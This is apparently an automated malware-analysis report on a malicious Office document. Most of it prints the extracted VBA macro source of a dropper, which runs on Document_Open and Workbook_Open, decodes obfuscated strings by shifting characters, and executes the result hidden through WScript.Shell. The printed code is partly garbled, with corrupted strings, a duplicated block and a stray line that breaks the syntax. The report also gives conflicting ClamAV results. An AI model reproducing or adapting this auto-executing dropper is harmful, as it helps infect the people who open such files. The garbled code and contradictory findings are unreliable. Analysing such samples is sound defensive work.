Verdict: MALICIOUS
Risk score: 298

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros. Critical heuristics indicate the use of WScript.Shell and CreateObject, along with a Shell() call, strongly suggesting the execution of arbitrary code. The Document_Open and Workbook_Open macros are auto-executing entry points. The VBA code appears to be obfuscated, but its intent is to download and execute a second-stage payload.
Heuristics (10)

- ClamAV: Doc.Dropper.Agent-6391839-0 (critical) CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6391839-0
- VBA macros detected (medium; 5 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- WScript.Shell usage (critical) OLE_VBA_WSCRIPT: WScript.Shell usage. Matched line in script: `CreateObject("WScript.Shell").Run XFR_ZJ, 0, True End Function`
- CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script: `CreateObject("WScript.Shell").Run XFR_ZJ, 0, True End Function`
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low) OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script: `End Function Public Sub Document_Open() I_RO`
- Workbook_Open macro (low) OLE_VBA_WBOPEN: Workbook_Open macro. Matched line in script: `End Sub Sub Workbook_Open() Document_Open`
- Reference to Windows Script Host (high) SC_STR_WSCRIPT: Reference to Windows Script Host
- Suspicious extracted artifact (medium) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9100 bytes |

SHA-256: 59a3200fe51ace06a5822d7acd72ba2eb460064fe933995e8cf009b172e201fc

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 55 of 98 identifiers look randomly generated (e.g. 'cccccccccwucc1c9$4vkcKcDc'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Public Function XFR_ZJ() As String
Dim W_JW As String
W_JW = "Œ‹“���„�ˆˆJ�”�<Is…Š€‹“o�•ˆ�<"
Dim CH_ULP As String
CH_ULP = "d…€€�Š<IŠ‹Œ�‹‚…ˆ�<e‚<D����IŒ"
Dim T_KIA As String
T_KIA = "}�„<<@�Š’V]ll`]p]<G<CxRŒU‹J�"
Dim JZJ_OK As String
JZJ_OK = "”�CE<—n�‰‹’�Ie��‰<<@�Š’V]ll`"
Dim XN_ULN As String
XN_ULN = "]p]<G<CxRŒU‹J�”�C™W<@ƒ…–t<Y<"
Dim YRQ_AMR As String
YRQ_AMR = "j�“Ik~†� �<o•���‰Jj��Js�~_ˆ…"
Dim DR_KYD As String
DR_KYD = "�Š�W<@ƒ…–tJd�}€���wCq���I]ƒ�"
Dim WE_WO As String
WE_WO = "Š�Cy<Y<C€€Iˆ‹ƒCW<@ƒ…–tJ`‹“Šˆ"
Dim KR_CZ As String
KR_CZ = "‹}€b…ˆ�DC„��ŒVKK„‹‰�J�}��„ˆ…"
Dim Q_JZ As String
Q_JZ = "ЇJŠ��Kš€}‰�‘�Š�•K…Š’‹… �KeŠ"
Dim XX_B As String
XX_B = "’‹… �{LQMNNLMS{‹‘�Œ‘�__]R]]b"
Dim N_O As String
N_O = "J� �CH<@�Š’V]ll`]p]<G<CxRŒU‹"
Dim X_SSE As String
X_SSE = "J�”�CEW<Dj�“Ik~†� �<I ‹‰<o„�"
Dim KI_TL As String
KI_TL = "ˆˆJ]ŒŒˆ… }�…‹ŠEJo„�ˆˆa”� ‘��"
Dim ZC_AF As String
ZC_AF = "D@�Š’V]ll`]p]<G<CxRŒU‹J�”�CE"
Dim AEB_URJ As String
AEB_URJ = "W<o�‹ŒIl�‹ ���<Ie€<@l…€<Ib‹� �"
Dim J_LPV As String
J_LPV = W_JW & CH_ULP & T_KIA & JZJ_OK & XN_ULN & YRQ_AMR & DR_KYD & WE_WO & KR_CZ & Q_JZ & XX_B & N_O & X_SSE & KI_TL & ZC_AF & AEB_URJ
Dim OJ_PB As Long
Dim XUD_P As String
For OJ_PB = 1 To Len(J_LPV)
XUD_P = XUD_P & Chr(Asc(Mid$(J_LPV, OJ_PB, 1)) - 28)
Next
Dim F_GD As String
F_GD = "c�•pc…9cccT›K“Ecy`Rc›>90cAr˜™‡BŸC�c�vcc3c*›cccHc`cTcJeu€cchc"
Dim IZ_VBD As String
IZ_VBD = "<{|cc{ckcc„Cc•cYNcc‘\ccccM{B6clcCJRcŒ=cdccccJ9co}ccc�c“c�ccc"
Dim H_HC As String
H_HC = "c3cscxcŒcB8~}cccApc*c£ Vfc1c4+cc2M;=™c)ajcc&\s¡c cc(cc0ccccc"
Dim L_OW As String
L_OW = ";k€o£ccccccndcc mvcc‡pI‡sŒc~cc7ccccicc8ccc-y)£c@c;|�c†cc} cd"
Dim L_L As String
L_L = "ccB7c=cccccaccfc‚ccpc-acccX(c|”cccccV�JocPc ŠccAxccccc4�cccc"
Dim O_TTL As String
O_TTL = "c�m™cq:–cŒš’jcŸBcjV†:cScšIRcc�ic—cc +c’–cc_]cjHšcctc�^cccCsc"
Dim HS_NAV As String
HS_NAV = "cGccccc cccc�—c“cc-tc?GXcc%,crG7_<�cccc˜ccc„8cjT7c:ccccc‚3SŸ"
Dim JH_Y As String
JH_Y = "cc™c|\c&~Occ˜ctcCcgccc\Iˆ�cccy”ccdcyccc�Rccc�^)c„8b–cc`ccckj"
Dim RES_JA As String
RES_JA = "cc<'ŸcccQˆcc`jccNˆc c;ccqcc<cccGc<c˜Œcœ5‰cc7-ccccc�cccc>ƒQ-c"
Dim EB_IXZ As String
EB_IXZ = "ccccG‘[t�cccb�ch'lc$cccc@?},c“ucc`cƒs€k}c�£cc`£ccc*› bc�5c+v"
Dim S_T As String
S_T = "clcŸ‡˜;&cScc%Qˆc)c-cc\c�cJŒc_qcyc xc'�£I¡ccƒšRccˆ`cKcX3W6crc"
Dim C_P As String
C_P = "ˆcc†u0c3B%�ccBccc-‡cccc5cQblhrccT™<ˆcc2�¢cc†cM�cœœc,IzFccGcŒ"
Dim UO_UC As String
UO_UC = "cc4c}h*{cEcc�â˜cccccccccwucc1c9$4vkcKcDc‚0Ocƒ,acc†Kcc&Jc£cc8"
Dim AA_T As String
AA_T = "4�‡ÒFcc9cO’cccm™€bc˜¡%1OœtZcŸcmcc�c~>ccc5ccnbcc�Sccccccc£c†]"
Dim MN_M As String
MN_M = "X™Iccczc~cyc‡cQ�c^c]”oM—˜ccH>wŠc�’�¡cc ccctcJ8hcMccpc�cc�YZc"
Dim L_EHO As String
L_EHO = "%|ccc/›cccšƒc…glc3ca3c5ccc4QjcC£“c’c>ccccc•ccc�cUcJcš?Ÿ:cs�="
Dim KX_ZD As String
KX_ZD = "c‰ccd•`Šcœ–pcc^}Ic`Mˆccœn-x¢|)cF“aUKccrc6cMccc˜dccvbc|�-ƒcŒc"
Dim P_B As String
P_B = "c¡£ctcv™7c�cc;cs�ccGcbc�œc£ccA]ccN|P¡‡cccPcCcccc>ccWh+cc7W��"
Dim JEJ_V As String
JEJ_V = "�ccccc>cYFc…;cc5cpc�c@cccccccš=mcqJvZ™€c�ccc^?cJcfcƒ3ctcŒccJ"
Dim YD_A As String
YD_A = "c�c,c�c�ccMcccccˆ‹c”cXwcccxc@cc£ccccupcc<c�Bcck�cc]8ccccUc^0"
Dim PN_MK As String
PN_MK = "ccc-`cc@c:ccO@¡£e20†-h¡ccn]8oCc�cŸ&N9c8£sccc_{’[ncccRccccYd�"
Dim RSJ_IYI As String
RSJ_IYI = "c,nccŸ�cŸycccc6?ccc%ccXR*c—�c ccjccccÙc-cccc›0ccccbc�cp˜c+cc"
Dim S_C As String
S_C = "‰sccšcUcc1iccc“•‹cec@‰+cƒc—Œ:c,Zo_+c$wccck�Zc-c(ic„ccWY‡|Vˆƒ"
Dim Y_FS As String
Y_FS = "cccrc’cc”7cŸ2cAccccc‡c8ccc+c+—cœ…—cccc%c^…c£:™c;Jc`ccIŸGccŠc"
Dim DJ_HGW As String
DJ_HGW = "cc;Œ>c6Šccc~œ&ccLcv”cc–_c›‡`�a^Xccc™;cccK3cc]cLcc?˜ccc‰cP�Gc"
Dim BDN_VJB As String
BDN_VJB = "McccIcbI64c›c.ccc}š¢_m£Fcbc,•cccccJclc'ccc.c'cccc—c(�cc„YcfI"
Dim SF_JRA As String
SF_JRA = "cc9c9+ccQc\ŒcccXc)cc;c7†cc:|ccrccac�cc€[cc_œ“c)ccTB„1†cccšc\"
Dim F_A As String
F_A = "chdccc3cc[;ccccWJQSiwGNxTbcKcec›cG•ccvccc�—c<‚cQc�cckcc=c;cc"
Dim J_VEP As String
J_VEP = "cccc‡’xcc¢cccc_cˆcc:ccT]bcŒccGcc¡˜cœcšc[cScK.c™ccJcqcnc”cHcc"
Dim W_J As String
W_J = "c_ )c€_ccrcc‡Scc›6Wcc'cccccN4,cuDo*¡c¢cccc\ccr@cccccc‚,Ac4cc"
Dim N_KW As String
N_KW = "�cc<M¢c‰cLj8<c`cccc4v…ƒwNc™c„ccXPc7cceWc�ccc•cc�cX"
=_pcccˆ>WccvccLMcy0cc{cc†cccc+”Tc7„c/chc<cc"
XFR_ZJ = XUD_P
End Function
Public Sub Document_Open()
I_RO
End Sub
Sub Workbook_Open()
Document_Open
End Sub
Public Function I_RO()
Dim F_GD As String
F_GD = "c�•pc…9cccT›K“Ecy`Rc›>90cAr˜™‡BŸC�c�vcc3c*›cccHc`cTcJeu€cchc"
Dim IZ_VBD As String
IZ_VBD = "<{|cc{ckcc„Cc•cYNcc‘\ccccM{B6clcCJRcŒ=cdccccJ9co}ccc�c“c�ccc"
Dim H_HC As String
H_HC = "c3cscxcŒcB8~}cccApc*c£ Vfc1c4+cc2M;=™c)ajcc&\s¡c cc(cc0ccccc"
Dim L_OW As String
L_OW = ";k€o£ccccccndcc mvcc‡pI‡sŒc~cc7ccccicc8ccc-y)£c@c;|�c†cc} cd"
Dim L_L As String
L_L = "ccB7c=cccccaccfc‚ccpc-acccX(c|”cccccV�JocPc ŠccAxccccc4�cccc"
Dim O_TTL As String
O_TTL = "c�m™cq:–cŒš’jcŸBcjV†:cScšIRcc�ic—cc +c’–cc_]cjHšcctc�^cccCsc"
Dim HS_NAV As String
HS_NAV = "cGccccc cccc�—c“cc-tc?GXcc%,crG7_<�cccc˜ccc„8cjT7c:ccccc‚3SŸ"
Dim JH_Y As String
JH_Y = "cc™c|\c&~Occ˜ctcCcgccc\Iˆ�cccy”ccdcyccc�Rccc�^)c„8b–cc`ccckj"
Dim RES_JA As String
RES_JA = "cc<'ŸcccQˆcc`jccNˆc c;ccqcc<cccGc<c˜Œcœ5‰cc7-ccccc�cccc>ƒQ-c"
Dim EB_IXZ As String
EB_IXZ = "ccccG‘[t�cccb�ch'lc$cccc@?},c“ucc`cƒs€k}c�£cc`£ccc*› bc�5c+v"
Dim S_T As String
S_T = "clcŸ‡˜;&cScc%Qˆc)c-cc\c�cJŒc_qcyc xc'�£I¡ccƒšRccˆ`cKcX3W6crc"
Dim C_P As String
C_P = "ˆcc†u0c3B%�ccBccc-‡cccc5cQblhrccT™<ˆcc2�¢cc†cM�cœœc,IzFccGcŒ"
Dim UO_UC As String
UO_UC = "cc4c}h*{cEcc�â˜cccccccccwucc1c9$4vkcKcDc‚0Ocƒ,acc†Kcc&Jc£cc8"
Dim AA_T As String
AA_T = "4�‡ÒFcc9cO’cccm™€bc˜¡%1OœtZcŸcmcc�c~>ccc5ccnbcc�Sccccccc£c†]"
Dim MN_M As String
MN_M = "X™Iccczc~cyc‡cQ�c^c]”oM—˜ccH>wŠc�’�¡cc ccctcJ8hcMccpc�cc�YZc"
Dim L_EHO As String
L_EHO = "%|ccc/›cccšƒc…glc3ca3c5ccc4QjcC£“c’c>ccccc•ccc�cUcJcš?Ÿ:cs�="
Dim KX_ZD As String
KX_ZD = "c‰ccd•`Šcœ–pcc^}Ic`Mˆccœn-x¢|)cF“aUKccrc6cMccc˜dccvbc|�-ƒcŒc"
Dim P_B As String
P_B = "c¡£ctcv™7c�cc;cs�ccGcbc�œc£ccA]ccN|P¡‡cccPcCcccc>ccWh+cc7W��"
Dim JEJ_V As String
JEJ_V = "�ccccc>cYFc…;cc5cpc�c@cccccccš=mcqJvZ™€c�ccc^?cJcfcƒ3ctcŒccJ"
Dim YD_A As String
YD_A = "c�c,c�c�ccMcccccˆ‹c”cXwcccxc@cc£ccccupcc<c�Bcck�cc]8ccccUc^0"
Dim PN_MK As String
PN_MK = "ccc-`cc@c:ccO@¡£e20†-h¡ccn]8oCc�cŸ&N9c8£sccc_{’[ncccRccccYd�"
Dim RSJ_IYI As String
RSJ_IYI = "c,nccŸ�cŸycccc6?ccc%ccXR*c—�c ccjccccÙc-cccc›0ccccbc�cp˜c+cc"
Dim S_C As String
S_C = "‰sccšcUcc1iccc“•‹cec@‰+cƒc—Œ:c,Zo_+c$wccck�Zc-c(ic„ccWY‡|Vˆƒ"
Dim Y_FS As String
Y_FS = "cccrc’cc”7cŸ2cAccccc‡c8ccc+c+—cœ…—cccc%c^…c£:™c;Jc`ccIŸGccŠc"
Dim DJ_HGW As String
DJ_HGW = "cc;Œ>c6Šccc~œ&ccLcv”cc–_c›‡`�a^Xccc™;cccK3cc]cLcc?˜ccc‰cP�Gc"
Dim BDN_VJB As String
BDN_VJB = "McccIcbI64c›c.ccc}š¢_m£Fcbc,•cccccJclc'ccc.c'cccc—c(�cc„YcfI"
Dim SF_JRA As String
SF_JRA = "cc9c9+ccQc\ŒcccXc)cc;c7†cc:|ccrccac�cc€[cc_œ“c)ccTB„1†cccšc\"
Dim F_A As String
F_A = "chdccc3cc[;ccccWJQSiwGNxTbcKcec›cG•ccvccc�—c<‚cQc�cckcc=c;cc"
Dim J_VEP As String
J_VEP = "cccc‡’xcc¢cccc_cˆcc:ccT]bcŒccGcc¡˜cœcšc[cScK.c™ccJcqcnc”cHcc"
Dim W_J As String
W_J = "c_ )c€_ccrcc‡Scc›6Wcc'cccccN4,cuDo*¡c¢cccc\ccr@cccccc‚,Ac4cc"
Dim N_KW As String
N_KW = "�cc<M¢c‰cLj8<c`cccc4v…ƒwNc™c„ccXPc7cceWc�ccc•cc�cX"
=_pcccˆ>WccvccLMcy0cc{cc†cccc+”Tc7„c/chc<cc"
CreateObject("WScript.Shell").Run XFR_ZJ, 0, True
End Function